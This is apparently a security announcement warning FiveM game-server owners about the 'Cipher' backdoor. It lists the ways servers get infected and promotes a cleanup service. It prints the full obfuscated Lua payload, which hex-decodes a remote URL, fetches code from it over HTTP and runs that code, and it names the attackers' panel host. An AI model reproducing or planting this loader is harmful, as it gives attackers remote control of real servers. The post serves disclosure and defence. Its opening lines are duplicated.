Hello everyone!
We would like to update you on the FiveM Backdoor that has been going around.
This backdoor can be injected via an exploit... The current resources are
These guys are called Cipher, they are a group of French scammers attacking different vulnerable servers for money.
This is what their payload looks like
It basically does a PerformHttpRequest call with a GET Request on
Their web panel can access any server that has this backdoor installed on the server, and you can't stop it until you remove it.
We are already dealing with this problem
ChocoHax White searches for these backdoors, removes them, and cleans up your server from the malicious code.
Best regards.
We would like to update you on the FiveM Backdoor that has been going around.
This backdoor can be injected via an exploit... The current resources are
1. Leaked or Cracked resource
2. Cars or Maps packs from unknown sources
3. Via runcode when using a really poor rcon_password
4. Exploitable resources such as. (esx_kashracters,vrp_basic_menu (old version) and anyother resource that allow to run lua code on a server side without permission checking)
These guys are called Cipher, they are a group of French scammers attacking different vulnerable servers for money.
This is what their payload looks like
code_language.lua:
local Enchanced_Tabs = {
Ench, Support, Host, Pairs,
Realease, Callbacks, Source,
Hosting, Event, PerformHttpRequest,
assert, server, load, Spawn, materials
}
local random_char = {
'68', '74', '74', '70', '73', '3a', '2f', '2f', '63', '69', '70', '68', '65', '72',
'2d', '70', '61', '6e', '65', '6c', '2e', '6d', '65', '2f', '5f', '69', '2f'; '72',
'2e', '70', '68', '70', '3f', '74', '6f', '3d', '30'
}
function str_utf8()
_empt = ''
for id,it in pairs(random_char) do
_empt = _empt..it
end
return (_empt:gsub('..', function (cc)
return string.char(tonumber(cc, 16))
end))
end
Enchanced_Tabs[10](str_utf8(), function (e, d)
local s = Enchanced_Tabs[11](Enchanced_Tabs[13](d))
if (d == nil) then return end
s()
end)
It basically does a PerformHttpRequest call with a GET Request on
https://cipher-panel.me/_i/r.php?to=0
loading the output of that requestTheir web panel can access any server that has this backdoor installed on the server, and you can't stop it until you remove it.
We are already dealing with this problem
ChocoHax White searches for these backdoors, removes them, and cleans up your server from the malicious code.
Best regards.